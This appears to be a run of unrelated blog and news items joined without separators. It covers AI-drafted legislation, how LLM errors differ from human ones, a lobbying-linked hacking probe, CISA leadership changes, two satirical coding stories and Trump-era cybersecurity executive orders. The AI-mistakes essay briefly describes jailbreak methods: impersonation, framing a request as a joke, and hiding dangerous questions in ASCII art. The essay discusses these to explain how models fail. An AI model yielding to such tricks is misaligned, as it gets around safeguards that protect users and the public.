But there’s another reason, particular to the US federal government, that will likely force congressional legislation to be more complex even during unified government. In June 2024, the US Supreme Court overturned the Chevron doctrine, which gave executive agencies broad power to specify and implement legislation. Suddenly, there is a mandate from the Supreme Court for more specific legislation. Issues that have historically been left implicitly to the executive branch are now required to be either explicitly delegated to agencies or specified directly in statute. Either way, the Court’s ruling implied that law should become more complex and that Congress should increase its policymaking capacity.
This affects the balance of power between the executive and legislative branches of government. When the legislature delegates less to the executive branch, it increases its own power. Every decision made explicitly in statute is a decision the executive makes not on its own but, rather, according to the directive of the legislature. In the US system of separation of powers, administrative law is a tool for balancing power among the legislative, executive, and judicial branches. The legislature gets to decide when to delegate and when not to, and it can respond to judicial review to adjust its delegation of control as needed. The elimination of Chevron will induce the legislature to exert its control over delegation more robustly.
At the same time, there are powerful political incentives for Congress to be vague and to rely on someone else, like agency bureaucrats, to make hard decisions. That empowers third parties—the corporations, or lobbyists—that have been gifted by the overturning of Chevron a new tool in arguing against administrative regulations not specifically backed up by law. A continuing stream of Supreme Court decisions handing victories to unpopular industries could be another driver of complex law, adding political pressure to pass legislative fixes.
AI Can Supply Complex Legislation
Congress may or may not be up to the challenge of putting more policy details into law, but the external forces outlined above—lobbyists, the judiciary, and an increasingly divided and polarized government—are pushing them to do so. When Congress does take on the task of writing complex legislation, it’s quite likely it will turn to AI for help.
Two particular AI capabilities enable Congress to write laws different from laws humans tend to write. One, AI models have an enormous scope of expertise, whereas people have only a handful of specializations. Large language models (LLMs) like the one powering ChatGPT can generate legislative text on funding specialty crop harvesting mechanization equally as well as material on energy efficiency standards for street lighting. This enables a legislator to address more topics simultaneously. Two, AI models have the sophistication to work with a higher degree of complexity than people can. Modern LLM systems can instantaneously perform several simultaneous multistep reasoning tasks using information from thousands of pages of documents. This enables a legislator to fill in more baroque detail on any given topic.
That’s not to say that handing over legislative drafting to machines is easily done. Modernizing any institutional process is extremely hard, even when the technology is readily available and performant. And modern AI still has a ways to go to achieve mastery of complex legal and policy issues. But the basic tools are there.
AI can be used in each step of lawmaking, and this will bring various benefits to policymakers. It could let them work on more policies—more bills—at the same time, add more detail and specificity to each bill, or interpret and incorporate more feedback from constituents and outside groups. The addition of a single AI tool to a legislative office may have an impact similar to adding several people to their staff, but with far lower cost.
Speed sometimes matters when writing law. When there is a change of governing party, there is often a rush to change as much policy as possible to match the platform of the new regime. AI could help legislators do that kind of wholesale revision. The result could be policy that is more responsive to voters—or more political instability. Already in 2024, the US House’s Office of the Clerk has begun using AI to speed up the process of producing cost estimates for bills and understanding how new legislation relates to existing code. Ohio has used an AI tool to do wholesale revision of state administrative law since 2020.
AI can also make laws clearer and more consistent. With their superhuman attention spans, AI tools are good at enforcing syntactic and grammatical rules. They will be effective at drafting text in precise and proper legislative language, or offering detailed feedback to human drafters. Borrowing ideas from software development, where coders use tools to identify common instances of bad programming practices, an AI reviewer can highlight bad law-writing practices. For example, it can detect when significant phrasing is inconsistent across a long bill. If a bill about insurance repeatedly lists a variety of disaster categories, but leaves one out one time, AI can catch that.
Perhaps this seems like minutiae, but a small ambiguity or mistake in law can have massive consequences. In 2015, the Affordable Care Act came close to being struck down because of a typo in four words, imperiling health care services extended to more than 7 million Americans.
There’s more that AI can do in the legislative process. AI can summarize bills and answer questions about their provisions. It can highlight aspects of a bill that align with, or are contrary to, different political points of view. We can even imagine a future in which AI can be used to simulate a new law and determine whether or not it would be effective, or what the side effects would be. This means that beyond writing them, AI could help lawmakers understand laws. Congress is notorious for producing bills hundreds of pages long, and many other countries sometimes have similarly massive omnibus bills that address many issues at once. It’s impossible for any one person to understand how each of these bills’ provisions would work. Many legislatures employ human analysis in budget or fiscal offices that analyze these bills and offer reports. AI could do this kind of work at greater speed and scale, so legislators could easily query an AI tool about how a particular bill would affect their district or areas of concern.
These capabilities will be attractive to legislators who are looking to expand their power and capabilities but don’t necessarily have more funding to hire human staff. We should understand the idea of AI-augmented lawmaking contextualized within the longer history of legislative technologies. To serve society at modern scales, we’ve had to come a long way from the Athenian ideals of direct democracy and sortition. Democracy no longer involves just one person and one vote to decide a policy. It involves hundreds of thousands of constituents electing one representative, who is augmented by a staff as well as subsidized by lobbyists, and who implements policy through a vast administrative state coordinated by digital technologies. Using AI to help those representatives specify and refine their policy ideas is part of a long history of transformation.
Whether all this AI augmentation is good for all of us subject to the laws they make is less clear. There are real risks to AI-written law, but those risks are not dramatically different from what we endure today. AI-written law trying to optimize for certain policy outcomes may get it wrong (just as many human-written laws are misguided). AI-written law may be manipulated to benefit one constituency over others, by the tech companies that develop the AI, or by the legislators who apply it, just as human lobbyists steer policy to benefit their clients.
Regardless of what anyone thinks of any of this, regardless of whether it will be a net positive or a net negative, AI-made legislation is coming—the growing complexity of policy demands it. It doesn’t require any changes in legislative procedures or agreement from any rules committee. All it takes is for one legislative assistant, or lobbyist, to fire up a chatbot and ask it to create a draft. When legislators voted on that Brazilian bill in 2023, they didn’t know it was AI-written; the use of ChatGPT was undisclosed. And even if they had known, it’s not clear it would have made a difference. In the future, as in the past, we won’t always know which laws will have good impacts and which will have bad effects, regardless of the words on the page, or who (or what) wrote them.
This essay was written with Nathan E. Sanders, and originally appeared in Lawfare.
Humans make mistakes all the time. All of us do, every day, in tasks both new and routine. Some of our mistakes are minor and some are catastrophic. Mistakes can break trust with our friends, lose the confidence of our bosses, and sometimes be the difference between life and death.
Over the millennia, we have created security systems to deal with the sorts of mistakes humans commonly make. These days, casinos rotate their dealers regularly, because they make mistakes if they do the same task for too long. Hospital personnel write on limbs before surgery so that doctors operate on the correct body part, and they count surgical instruments to make sure none were left inside the body. From copyediting to double-entry bookkeeping to appellate courts, we humans have gotten really good at correcting human mistakes.
Humanity is now rapidly integrating a wholly different kind of mistake-maker into society: AI. Technologies like large language models (LLMs) can perform many cognitive tasks traditionally fulfilled by humans, but they make plenty of mistakes. It seems ridiculous when chatbots tell you to eat rocks or add glue to pizza. But it’s not the frequency or severity of AI systems’ mistakes that differentiates them from human mistakes. It’s their weirdness. AI systems do not make mistakes in the same ways that humans do.
Much of the friction—and risk—associated with our use of AI arises from that difference. We need to invent new security systems that adapt to these differences and prevent harm from AI mistakes.
Human Mistakes vs AI Mistakes
Life experience makes it fairly easy for each of us to guess when and where humans will make mistakes. Human errors tend to come at the edges of someone’s knowledge: Most of us would make mistakes solving calculus problems. We expect human mistakes to be clustered: A single calculus mistake is likely to be accompanied by others. We expect mistakes to wax and wane, predictably depending on factors such as fatigue and distraction. And mistakes are often accompanied by ignorance: Someone who makes calculus mistakes is also likely to respond “I don’t know” to calculus-related questions.
To the extent that AI systems make these human-like mistakes, we can bring all of our mistake-correcting systems to bear on their output. But the current crop of AI models—particularly LLMs—make mistakes differently.
AI errors come at seemingly random times, without any clustering around particular topics. LLM mistakes tend to be more evenly distributed through the knowledge space. A model might be equally likely to make a mistake on a calculus question as it is to propose that cabbages eat goats.
And AI mistakes aren’t accompanied by ignorance. An LLM will be just as confident when saying something completely wrong—and obviously so, to a human—as it will be when saying something true. The seemingly random inconsistency of LLMs makes it hard to trust their reasoning in complex, multi-step problems. If you want to use an AI model to help with a business problem, it’s not enough to see that it understands what factors make a product profitable; you need to be sure it won’t forget what money is.
How to Deal with AI Mistakes
This situation indicates two possible areas of research. The first is to engineer LLMs that make more human-like mistakes. The second is to build new mistake-correcting systems that deal with the specific sorts of mistakes that LLMs tend to make.
We already have some tools to lead LLMs to act in more human-like ways. Many of these arise from the field of “alignment” research, which aims to make models act in accordance with the goals and motivations of their human developers. One example is the technique that was arguably responsible for the breakthrough success of ChatGPT: reinforcement learning with human feedback. In this method, an AI model is (figuratively) rewarded for producing responses that get a thumbs-up from human evaluators. Similar approaches could be used to induce AI systems to make more human-like mistakes, particularly by penalizing them more for mistakes that are less intelligible.
When it comes to catching AI mistakes, some of the systems that we use to prevent human mistakes will help. To an extent, forcing LLMs to double-check their own work can help prevent errors. But LLMs can also confabulate seemingly plausible, but truly ridiculous, explanations for their flights from reason.
Other mistake mitigation systems for AI are unlike anything we use for humans. Because machines can’t get fatigued or frustrated in the way that humans do, it can help to ask an LLM the same question repeatedly in slightly different ways and then synthesize its multiple responses. Humans won’t put up with that kind of annoying repetition, but machines will.
Understanding Similarities and Differences
Researchers are still struggling to understand where LLM mistakes diverge from human ones. Some of the weirdness of AI is actually more human-like than it first appears. Small changes to a query to an LLM can result in wildly different responses, a problem known as prompt sensitivity. But, as any survey researcher can tell you, humans behave this way, too. The phrasing of a question in an opinion poll can have drastic impacts on the answers.
LLMs also seem to have a bias towards repeating the words that were most common in their training data; for example, guessing familiar place names like “America” even when asked about more exotic locations. Perhaps this is an example of the human “availability heuristic” manifesting in LLMs, with machines spitting out the first thing that comes to mind rather than reasoning through the question. And like humans, perhaps, some LLMs seem to get distracted in the middle of long documents; they’re better able to remember facts from the beginning and end. There is already progress on improving this error mode, as researchers have found that LLMs trained on more examples of retrieving information from long texts seem to do better at retrieving information uniformly.
In some cases, what’s bizarre about LLMs is that they act more like humans than we think they should. For example, some researchers have tested the hypothesis that LLMs perform better when offered a cash reward or threatened with death. It also turns out that some of the best ways to “jailbreak” LLMs (getting them to disobey their creators’ explicit instructions) look a lot like the kinds of social engineering tricks that humans use on each other: for example, pretending to be someone else or saying that the request is just a joke. But other effective jailbreaking techniques are things no human would ever fall for. One group found that if they used ASCII art (constructions of symbols that look like words or pictures) to pose dangerous questions, like how to build a bomb, the LLM would answer them willingly.
Humans may occasionally make seemingly random, incomprehensible, and inconsistent mistakes, but such occurrences are rare and often indicative of more serious problems. We also tend not to put people exhibiting these behaviors in decision-making positions. Likewise, we should confine AI decision-making systems to applications that suit their actual abilities—while keeping the potential ramifications of their mistakes firmly in mind.
This essay was written with Nathan E. Sanders, and originally appeared in IEEE Spectrum.
The Department of Justice is investigating a lobbying firm representing ExxonMobil for hacking the phones of climate activists:
The hacking was allegedly commissioned by a Washington, D.C., lobbying firm, according to a lawyer representing the U.S. government. The firm, in turn, was allegedly working on behalf of one of the world’s largest oil and gas companies, based in Texas, that wanted to discredit groups and individuals involved in climate litigation, according to the lawyer for the U.S. government. In court documents, the Justice Department does not name either company.
As part of its probe, the U.S. is trying to extradite an Israeli private investigator named Amit Forlit from the United Kingdom for allegedly orchestrating the hacking campaign. A lawyer for Forlit claimed in a court filing that the hacking operation her client is accused of leading “is alleged to have been commissioned by DCI Group, a lobbying firm representing ExxonMobil, one of the world’s largest fossil fuel companies.”
Jen Easterly is out as the Director of CISA. Read her final interview:
There’s a lot of unfinished business. We have made an impact through our ransomware vulnerability warning pilot and our pre-ransomware notification initiative, and I’m really proud of that, because we work on preventing somebody from having their worst day. But ransomware is still a problem. We have been laser-focused on PRC cyber actors. That will continue to be a huge problem. I’m really proud of where we are, but there’s much, much more work to be done. There are things that I think we can continue driving, that the next administration, I hope, will look at, because, frankly, cybersecurity is a national security issue.
If Project 2025 is a guide, the agency will be gutted under Trump:
“Project 2025’s recommendations—essentially because this one thing caused anger—is to just strip the agency of all of its support altogether,” he said. “And CISA’s functions go so far beyond its role in the information space in a way that would do real harm to election officials and leave them less prepared to tackle future challenges.”
In the DHS chapter of Project 2025, Cuccinelli suggests gutting CISA almost entirely, moving its core responsibilities on critical infrastructure to the Department of Transportation. It’s a suggestion that Adav Noti, the executive director of the nonpartisan voting rights advocacy organization Campaign Legal Center, previously described to Democracy Docket as “absolutely bonkers.”
“It’s located at Homeland Security because the whole premise of the Department of Homeland Security is that it’s supposed to be the central resource for the protection of the nation,” Noti said. “And that the important functions shouldn’t be living out in siloed agencies.”
Paul's co-worker needed to manage some data in a tree. To do that, they wrote this Java function:
private static boolean existsFather(ArrayList<Integer> fatherFolder, Integer fatherId) {
    for (Integer father : fatherFolder) {
        if (father.equals(fatherId))
            return true;
    }
    return false;
}
I do not know what the integers in use represent here. I don't think they're actually representing "folders", despite the variable names in the code. I certainly hope it's not representing files and folders, because that implies they're tossing around file handles in some C-brained approach (but badly, since it implies they've got an open handle for every object).
The core WTF, in my opinion, is this: the code clearly implies some sort of tree structure, and the tree contains integers, but instead of using any of Java's structures for handling trees, they implemented this slipshod approach. And even then, the code could be made more generic, as the general process works with any sane Java type.
But there's also the obvious WTF: the java.util.Collection interface, which an ArrayList implements, already handles all of this in its contains method. This entire function could be replaced with fatherFolder.contains(fatherId).
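For illustration, here's a minimal sketch of what that replacement could look like; the wrapping ContainsExample class and the sample values in main are hypothetical, added only so the snippet compiles and runs on its own:
import java.util.ArrayList;
import java.util.List;

class ContainsExample {
    // Collection#contains performs the same equals()-based linear scan as the
    // hand-rolled loop above, so the whole method shrinks to a single call.
    private static boolean existsFather(ArrayList<Integer> fatherFolder, Integer fatherId) {
        return fatherFolder.contains(fatherId);
    }

    public static void main(String[] args) {
        ArrayList<Integer> folders = new ArrayList<>(List.of(10, 20, 30));
        System.out.println(existsFather(folders, 20)); // true
        System.out.println(existsFather(folders, 99)); // false
    }
}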
Paul writes: "I guess the last developer didn't know that every implementation of a java.util.Collection has a method called contains. At least they knew how to do a for-each."
Author: Majoki Cantor waited until Hazzez finished checking the airlock before asking about the Frumies. Hazzez flashed a crooked grin revealing the eclectic range of micro-implants in his teeth. “Why do you want to know about the Frumies?” Cantor shrugged. “Sarge said not to give them anything under any circumstances. Zilch. Nada. Why? Seems kind […]
President Trump last week issued a flurry of executive orders that upended a number of government initiatives focused on improving the nation’s cybersecurity posture. The president fired all advisors from the Department of Homeland Security’s Cyber Safety Review Board, called for the creation of a strategic cryptocurrency reserve, and voided a Biden administration action that sought to reduce the risks that artificial intelligence poses to consumers, workers and national security.
On his first full day back in the White House, Trump dismissed all 15 advisory committee members of the Cyber Safety Review Board (CSRB), a nonpartisan government entity established in February 2022 with a mandate to investigate the causes of major cybersecurity events. The CSRB has so far produced three detailed reports, including an analysis of the Log4Shell vulnerability crisis, attacks from the cybercrime group LAPSUS$, and the 2023 Microsoft Exchange Online breach.
The CSRB was in the midst of an inquiry into cyber intrusions uncovered recently across a broad spectrum of U.S. telecommunications providers at the hands of Chinese state-sponsored hackers. One of the CSRB’s most recognizable names is Chris Krebs (no relation), the former director of the Cybersecurity and Infrastructure Security Agency (CISA). Krebs was fired by President Trump in November 2020 for declaring the presidential contest was the most secure in American history, and for refuting Trump’s false claims of election fraud.
South Dakota Governor Kristi Noem, confirmed by the U.S. Senate last week as the new director of the DHS, criticized CISA at her confirmation hearing, The Record reports.
Noem told lawmakers CISA needs to be “much more effective, smaller, more nimble, to really fulfill their mission,” which she said should be focused on hardening federal IT systems and hunting for digital intruders. Noem said the agency’s work on fighting misinformation shows it has “gotten far off mission” and involved “using their resources in ways that was never intended.”
“The misinformation and disinformation that they have stuck their toe into and meddled with, should be refocused back onto what their job is,” she said.
Moses Frost, a cybersecurity instructor with the SANS Institute, compared the sacking of the CSRB members to firing all of the experts at the National Transportation Safety Board (NTSB) while they’re in the middle of an investigation into a string of airline disasters.
“I don’t recall seeing an ‘NTSB Board’ being fired during the middle of a plane crash investigation,” Frost said in a recent SANS newsletter. “I can say that the attackers in the phone companies will not stop because the review board has gone away. We do need to figure out how these attacks occurred, and CISA did appear to be doing some good for the vast majority of the federal systems.”
Speaking of transportation, The Record notes that Transportation Security Administration chief David Pekoske was fired despite overseeing critical cybersecurity improvements across pipeline, rail and aviation sectors. Pekoske was appointed by Trump in 2017 and had his 5-year tenure renewed in 2022 by former President Joe Biden.
AI & CRYPTOCURRENCY
Shortly after being sworn in for a second time, Trump voided a Biden executive order that focused on supporting research and development in artificial intelligence. The previous administration’s order on AI was crafted with an eye toward managing the safety and security risks introduced by the technology. But a statement released by the White House said Biden’s approach to AI had hindered development, and that the United States would support AI systems that are “free from ideological bias or engineered social agendas,” to maintain leadership.
The Trump administration issued its own executive order on AI, which calls for an “AI Action Plan” to be led by the assistant to the president for science and technology, the White House “AI & crypto czar,” and the national security advisor. It also directs the White House to revise and reissue policies to federal agencies on the government’s acquisition and governance of AI “to ensure that harmful barriers to America’s AI leadership are eliminated.”
Trump’s AI & crypto czar is David Sacks, an entrepreneur and Silicon Valley venture capitalist who argues that the Biden administration’s approach to AI and cryptocurrency has driven innovation overseas. Sacks recently asserted that non-fungible cryptocurrency tokens and memecoins are neither securities nor commodities, but rather should be treated as “collectibles” like baseball cards and stamps.
There is already a legal definition of collectibles under the U.S. tax code that applies to things like art or antiques, which can be subject to high capital gains taxes. But Joe Hall, a capital markets attorney and partner at Davis Polk, told Fortune there are no market regulations that apply to collectibles under U.S. securities law. Hall said Sacks’ comments “suggest a viewpoint that it would not be appropriate to regulate these things the way we regulate securities.”
The new administration’s position makes sense considering that the Trump family is deeply and personally invested in a number of recent memecoin ventures that have attracted billions from investors. President Trump and First Lady Melania Trump each launched their own vanity memecoins this month, dubbed $TRUMP and $MELANIA.
The Wall Street Journal reported Thursday that the market capitalization of $TRUMP stood at about $7 billion, down from a peak of nearly $15 billion, while $MELANIA was hovering somewhere around the $460 million mark. Just two months before the 2024 election, Trump’s three sons debuted a cryptocurrency token called World Liberty Financial.
Despite maintaining a considerable personal stake in how cryptocurrency is regulated, Trump issued an executive order on January 23 calling for a working group to be chaired by Sacks that would develop “a federal regulatory framework governing digital assets, including stablecoins,” and evaluate the creation of a “strategic national digital assets stockpile.”
Translation: Using taxpayer dollars to prop up the speculative, volatile, and highly risky cryptocurrency industry, which has been marked by endless scams, rug-pulls, 8-figure cyber heists, rampant fraud, and unrestrained innovations in money laundering.
WEAPONIZATION & DISINFORMATION
Prior to the election, President Trump frequently vowed to use a second term to exact retribution against his perceived enemies. Part of that promise materialized in an executive order Trump issued last week titled “Ending the Weaponization of the Federal Government,” which decried “an unprecedented, third-world weaponization of prosecutorial power to upend the democratic process,” in the prosecution of more than 1,500 people who invaded the U.S. Capitol on Jan. 6, 2021.
On Jan. 21, Trump commuted the sentences of several leaders of the Proud Boys and Oath Keepers who were convicted of seditious conspiracy. He also issued “a full, complete and unconditional pardon to all other individuals convicted of offenses related to events that occurred at or near the United States Capitol on January 6, 2021,” which include those who assaulted law enforcement officers.
The New York Times reports “the language of the document suggests — but does not explicitly state — that the Trump administration review will examine the actions of local district attorneys or state officials, such as the district attorneys in Manhattan or Fulton County, Ga., or the New York attorney general, all of whom filed cases against President Trump.”
“Over the last 4 years, the previous administration trampled free speech rights by censoring Americans’ speech on online platforms, often by exerting substantial coercive pressure on third parties, such as social media companies, to moderate, deplatform, or otherwise suppress speech that the Federal Government did not approve,” the Trump administration alleged. “Under the guise of combatting ‘misinformation,’ ‘disinformation,’ and ‘malinformation,’ the Federal Government infringed on the constitutionally protected speech rights of American citizens across the United States in a manner that advanced the Government’s preferred narrative about significant matters of public debate.”
Both of these executive orders have potential implications for security, privacy and civil liberties activists who have sought to track conspiracy theories and raise awareness about disinformation efforts on social media coming from U.S. adversaries.
In the wake of the 2020 election, Republicans created the House Judiciary Committee’s Select Subcommittee on the Weaponization of the Federal Government. Led by GOP Rep. Jim Jordan of Ohio, the committee’s stated purpose was to investigate alleged collusion between the Biden administration and tech companies to unconstitutionally shut down political speech.
The GOP committee focused much of its ire at members of the short-lived Disinformation Governance Board, an advisory board to DHS created in 2022 (the “combating misinformation, disinformation, and malinformation” quote from Trump’s executive order is a reference to the board’s stated mission). Conservative groups seized on social media posts made by the director of the board, who resigned after facing death threats. The board was dissolved by DHS soon after.
In his first administration, President Trump created a special prosecutor to probe the origins of the FBI’s investigation into possible collusion between the Trump campaign and Russian operatives seeking to influence the 2016 election. Part of that inquiry examined evidence gathered by some of the world’s most renowned cybersecurity experts who identified frequent and unexplained communications between an email server used by the Trump Organization and Alfa Bank, one of Russia’s largest financial institutions.
Trump’s Special Prosecutor John Durham later subpoenaed and/or deposed dozens of security experts who’d collected, viewed or merely commented on the data. Similar harassment and deposition demands would come from lawyers for Alfa Bank. Durham ultimately indicted Michael Sussmann, the former federal cybercrime prosecutor who reported the oddity to the FBI. Sussmann was acquitted in May 2022. Last week, Trump appointed Durham to lead the U.S. attorney’s office in Brooklyn, NY.
Quinta Jurecic at Lawfare notes that while the executive actions are ominous, they are also vague, and could conceivably generate either a campaign of retaliation, or nothing at all.
“The two orders establish that there will be investigations but leave open the questions of what kind of investigations, what will be investigated, how long this will take, and what the consequences might be,” Jurecic wrote. “It is difficult to draw firm conclusions as to what to expect. Whether this ambiguity is intentional or the result of sloppiness or disagreement within Trump’s team, it has at least one immediate advantage as far as the president is concerned: generating fear among the broad universe of potential subjects of those investigations.”
On Friday, Trump moved to fire at least 17 inspectors general, the government watchdogs who conduct audits and investigations of executive branch actions, and who often uncover instances of government waste, fraud and abuse. Lawfare’s Jack Goldsmith argues that the removals are probably legal even though Trump did not give the congressional notice of the terminations that a 2022 law requires.
“Trump probably acted lawfully, I think, because the notice requirement is probably unconstitutional,” Goldsmith wrote. “The real bite in the 2022 law, however, comes in the limitations it places on Trump’s power to replace the terminated IGs—limitations that I believe are constitutional. This aspect of the law will make it hard, but not impossible, for Trump to put loyalists atop the dozens of vacant IG offices around the executive branch. The ultimate fate of IG independence during Trump 2.0, however, depends less on legal protections than on whether Congress, which traditionally protects IGs, stands up for them now. Don’t hold your breath.”
Among the many Biden administration executive orders revoked by President Trump last week was an action from December 2021 establishing the United States Council on Transnational Organized Crime, which is charged with advising the White House on a range of criminal activities, including drug and weapons trafficking, migrant smuggling, human trafficking, cybercrime, intellectual property theft, money laundering, wildlife and timber trafficking, illegal fishing, and illegal mining.
So far, the White House doesn’t appear to have revoked an executive order that former President Biden issued less than a week before President Trump took office. On Jan. 16, 2025, Biden released a directive that focused on improving the security of federal agencies and contractors, and giving the government more power to sanction the hackers who target critical infrastructure.
Denise's company formed a new team. They had a lot of low-quality legacy code, and it had gotten where it was, in terms of quality, because the company had no real policies or procedures that encouraged good code. "If it works, it ships," was basically the motto. They wanted to change that, and the first step was creating a new software team to kick off green-field projects with an eye towards software craftsmanship.
Enter Jack. Jack was the technical lead, and Jack had a vision of good software. This started with banning ORM-generated database models. But it didn't involve writing raw SQL either: Jack hand-forged their tables with the Visual Table Designer feature of SQL Server Management Studio.
"The advantage," he happily explained to Denise, "is that we can then just generate our ORM layer right off the database. And when the database changes, we just regenerate- it's way easier than trying to build migrations."
"Right, but even if we're not using ORM migrations, we still want to write migration scripts for our changes to our database. We need to version control them and test them."
"We test them by making the change and running the test suite," Jack said.
And what a test suite it was. There was 100% test coverage. There was test coverage on simple getter/setter methods. There was test coverage on the data transfer objects, which had no methods but getters and setters. There were unit tests for functions that did nothing more than dispatch to built-in functions. Many of the tests just verified that a result was returned, but never checked what the result was. There were unit tests on the auto-generated ORM objects.
The last one, of course, meant that any time they changed the database, there was a significant risk that the test suite would fail on code that they hadn't written. Not only did they need to update the code consuming the data and the tests on that code; they also had to update the tests on the autogenerated code.
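To make that flavor of test concrete, here is a hypothetical sketch, written in Java with JUnit 5 purely for illustration (the DTO and test names are invented, not taken from Denise's codebase), of a test that pads the coverage numbers while asserting almost nothing:
import static org.junit.jupiter.api.Assertions.assertNotNull;

import org.junit.jupiter.api.Test;

class CustomerDtoTest {

    // A trivial data transfer object of the kind described above:
    // nothing but a getter and a setter.
    static class CustomerDto {
        private String name;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
    }

    @Test
    void getNameReturnsSomething() {
        CustomerDto dto = new CustomerDto();
        dto.setName("Alice");
        // Verifies that a result was returned, but never checks what the result was.
        assertNotNull(dto.getName());
    }
}
A test like this passes even if getName() returned the wrong value entirely, which is why 100% coverage bought the team so little confidence.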
Jack's magnum opus, in the whole thing, was that he designed the software with a plugin architecture. Instead of tightly coupling different implementations of various modules together, there was a plugin loader which could fetch an assembly at runtime and use that. Unfortunately, while the whole thing could have plugins, all of the abstractions leaked across module boundaries so you couldn't reasonably swap out plugins without rewriting the entire application. Instead of making a modular architecture, Jack just made starting the application wildly inefficient.
Denise and her team brought their concerns to management. Conversations were had, and it fell upon Jack to school them all. Cheerfully, he said: "Look, not everyone gets software craftsmanship, so I'm going to implement a new feature as sort of a reference implementation. If you follow the pattern I lay out, you'll have an easy time building good code!"
The new feature was an identity verification system which called for end users to upload photographs of their IDs- drivers' licenses, passports, etc. It was not a feature which should have had one developer driving the whole thing, and Jack was not implementing the entire lifecycle of data management for this; instead he was just implementing the upload feature.
Jack pushed it through, out and up into production. Somehow, he short-cut past any code reviews, feature reviews, or getting anyone else to test it. He went straight to a demo in production, where he uploaded his passport and license. "So, there you go, a reference implementation for you all."
Denise went ahead and ran her own test, with a synthetic ID for a test user, which didn't contain any real humans' information. The file upload crashed. In fact, in an ultimate variation of "it works on my machine," the only person who ever successfully used the upload feature was Jack. Of course, since the upload never worked, none of the other features, like retention policies, ever got implemented either.
Now, this didn't mean the company couldn't do identity verification: they had an existing system, so they just kept redirecting users to that instead of the new version, which didn't work.
Jack went on to other features, though, because he was a clever craftsman and needed to bring his wisdom to the rest of their project. So the file upload just languished, never getting fixed. Somehow, this wasn't Jack's fault, management didn't hold him responsible, and everyone was still expected to follow the patterns he used in designing the feature to guide their own work.
Until, one day, the system was breached by hackers. This, surprisingly, had nothing to do with Jack's choices: one of the admins got phished. This meant that the company needed to send out an announcement, informing users that they were breached. "We deeply regret the breach in our identity verification system, but can confirm that no personal data for any of our customers was affected."
Jack, of course, was not a customer, so he got a private disclosure that his passport and ID had been compromised.
Author: Julian Miles, Staff Writer “Does it ever end?” Bruce rises slightly and turns to stare at Lilimya. “If you don’t pay attention, it’ll end sooner than y-” He explodes from the waist up, a wave of heat momentarily turning snowflakes to steam. Lilimya is blown backwards, splinters of bone peppering her armour amidst a […]